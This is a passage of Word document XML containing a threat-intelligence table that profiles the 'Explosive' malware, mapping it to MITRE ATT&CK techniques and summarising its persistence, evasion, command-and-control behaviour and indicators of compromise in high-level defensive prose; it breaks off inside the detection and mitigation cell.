          <w:p w14:paraId="01AF3595" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>ATT&amp;CK Techniques Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39A7399F" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1105</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Ingress Tool Transfer </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1059</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Command and Scripting Interpreter </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1071</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Application Layer Protocol </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1027</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Obfuscated Files or Information </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1036</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Masquerading </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1543.003</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Create or Modify System Process: Windows Service </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1055</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Process Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="79C5ACDF" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26695A72" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Execution Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32BF8E5F" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Executed through malicious binaries or DLLs delivered after initial compromise. It downloads and launches additional payloads while enabling attacker-controlled command execution.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="02F6FAA7" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F85E977" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Persistence Techniques</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F5A36D9" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Maintains persistence through Windows services, registry modifications, startup entries, and disguised malicious components.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="531E2C7D" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57FA87A6" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4132C0E0" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>No standalone privilege escalation exploit publicly documented; attackers generally rely on previously obtained administrative privileges or companion tools.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="71ED5F1E" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="479D8C74" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Defense Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02221E34" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Uses obfuscation, process injection, masquerading, encrypted communications, and stealthy file placement to evade detection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="444B0B69" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A6704E0" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D32E36A" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>No dedicated credential theft functionality publicly documented within Explosive itself; secondary payloads may perform credential harvesting.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="0C3AC844" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E0193F0" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Discovery Techniques</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D951B07" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Performs system reconnaissance and environment checks to gather information about compromised hosts before deploying additional malware.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="3632B381" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4621A1C2" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Lateral Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13476D24" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Supports attacker-controlled operations that may facilitate lateral movement through deployment of additional tools and remote command execution.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="55ABC8A5" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="521D22E5" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Command &amp; Control (C2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42D08C86" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Communicates with attacker-controlled servers over application-layer protocols to receive commands and download secondary payloads.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="0DEB4322" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A3D4539" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B956908" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Can support exfiltration of collected data and command results through its C2 communication channels.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="4C381B5F" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="157B200F" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Impact Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F899579" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Enables long-term unauthorized access, stealthy malware delivery, espionage operations, and persistent compromise of enterprise systems.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="373F37BC" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F7EF23E" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Indicators of Compromise (IOCs)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="641FE91F" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Suspicious Windows services, unusual DLL execution, process injection behavior, obfuscated binaries, unexpected outbound traffic, disguised executable names, and unauthorized startup modifications.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="1825553C" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F49E93D" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Detection &amp; Mitigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="218576A5" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
